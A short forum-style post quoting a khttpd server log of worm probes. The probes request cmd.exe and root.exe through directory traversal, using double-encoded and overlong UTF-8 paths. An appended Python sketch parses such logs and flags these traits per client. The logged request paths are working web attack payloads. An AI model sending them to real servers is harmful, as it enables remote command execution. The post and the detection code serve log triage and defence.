Never mind, found the problem after turning on verbose HTTP reporting:

khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/scripts/root.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/MSADC/root.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/c/winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/d/winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir"

*sigh*, time to call the IM guys again and tell them to do their jobs.
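
A log-triage sketch for lines in the khttpd format shown above, added here as an example and not part of the original post. It repeatedly percent-decodes each request path, then flags double encoding, invalid/overlong UTF-8 lead bytes, directory traversal and requests for cmd.exe or root.exe, counted per client. It assumes the address after "connection from" is the client; the function names are hypothetical and the sample uses constructed documentation addresses with request paths taken from the log.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

CONN = re.compile(r'^khttpd: \S+ connection from (\S+)$')
GET = re.compile(r'^khttpd: GET "(.*)"$')

# Constructed sample: documentation addresses, paths copied from the log above.
SAMPLE = '''
khttpd: 192.0.2.10 connection from 198.51.100.7
khttpd: GET "/index.html"
khttpd: 192.0.2.10 connection from 203.0.113.5
khttpd: GET "/scripts/root.exe?/c+dir"
khttpd: 192.0.2.10 connection from 203.0.113.5
khttpd: GET "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir"
khttpd: 192.0.2.10 connection from 203.0.113.5
khttpd: GET "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir"
'''

def decode_fully(path, max_rounds=5):
    """Percent-decode until the value stops changing; return (bytes, rounds)."""
    data, rounds = path.encode(), 0
    while rounds < max_rounds:
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds

def classify(path):
    """Return the set of suspicious traits found in one request path."""
    data, rounds = decode_fully(path)
    flags = set()
    if rounds >= 2:                          # e.g. %255c -> %5c -> backslash
        flags.add("double-encoding")
    if b"\xc0" in data or b"\xc1" in data:   # lead bytes never valid in UTF-8
        flags.add("overlong-utf8")
    if re.search(rb"\.\.[\\/]", data):
        flags.add("traversal")
    if re.search(rb"(cmd|root)\.exe", data.lower()):
        flags.add("shell-binary")
    return flags

def scan(log_text):
    """Pair each connection line with the GET after it; return {client: Counter}."""
    hits, src = {}, None
    for line in log_text.splitlines():
        if m := CONN.match(line):
            src = m.group(1)
        elif (m := GET.match(line)) and src:
            if flags := classify(m.group(1)):
                hits.setdefault(src, Counter()).update(flags)
            src = None
    return hits
```

Calling `scan()` on the full log text returns one counter per client, so a single host producing many flagged requests stands out immediately.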